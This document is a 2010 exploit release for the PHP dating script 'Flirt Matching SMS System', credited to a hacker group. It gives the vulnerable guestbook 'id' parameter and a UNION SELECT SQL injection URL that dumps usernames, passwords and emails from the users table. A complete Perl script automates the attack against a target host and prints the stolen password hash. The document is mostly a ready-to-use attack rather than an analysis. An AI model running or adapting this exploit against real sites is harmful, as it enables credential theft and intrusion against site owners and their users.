----------------------------Information------------------------------------------------ +Name : Flirt Matching SMS System <= SQL Injection Exploit +Autor : Easy Laster +Date : 26.03.2010 +Script : Flirt Matching SMS System +Download : ------------------ +Demo : http://phpspezial.de/singel/ +Price : 39,99€ +Language :PHP +Discovered by Easy Laster +Security Group 4004-Security-Project +Greetz to Team-Internet ,Underground Agents +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge, N00bor,Ic3Drag0n,novaca!ne. --------------------------------------------------------------------------------------- ___ ___ ___ ___ _ _ _____ _ _ | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_ |_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _| |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_| |___| |___| ---------------------------------------------------------------------------------------- +Vulnerability : http://www.site.com/flirt/index.php?site=guestbook&id= +Exploitable : http://www.site.com/flirt/index.php?site=guestbook&id=9999999999+union +select+1,2,3,4,concat(id,0x3a,username,0x3a,password,0x3a,email),6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from +users+where+id=1 ----------------------------------------------------------------------------------------- #SQL Injection Exploit #!usr\bin\perl # # ################################################## # Modules # #------------------------------------------------# use strict; # Better coding. # use warnings; # Useful warnings. # use LWP::Simple; # procedureal interface# ################################################## print " ################################################## # 4004-Security-Project # ################################################## # Flirt Matching SMS System SQL Injection # # Exploit # # Using Host+Path+Userid # # www.demo.com /flirt/ 1 # # Discovered and vulnerability by Easy Laster # # coded by Easy Laster # ################################################## \a\n"; my($host,$path,$userid,$request); my($first,$block,$error,$dir); $block = " ##################################################\n"; $error = "Exploit failed"; print "$block"; print q(Target www.demo.com->); chomp($host =); if ($host eq""){ die "$error\a\n"}; print "$block"; print q(Path /path/ ->); chomp($path =); if ($path eq""){ die "$error\a\n";} print "$block"; print q(userid->); chomp($userid =); if ($userid eq""){ die "$error\a\n";} print "$block"; $dir = "index.php?site=guestbook&id="; print "<~> Exploiting...\n"; $host = "http://".$host.$path; print "<~> Connecting...\n"; $request = get($host.$dir."9999999999+union+select+1,2,3,4,concat(password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+users+where+id=".$userid."--"); $first = rindex($request,"Gästebuch von"); if ($first != -1) { print "<~> Exploiting...\n"; print "$block\n"; $request = substr($request, $first+14, 34); print "<~> Hash = $request\n\r\n\a"; } else { print "<~> $error"; }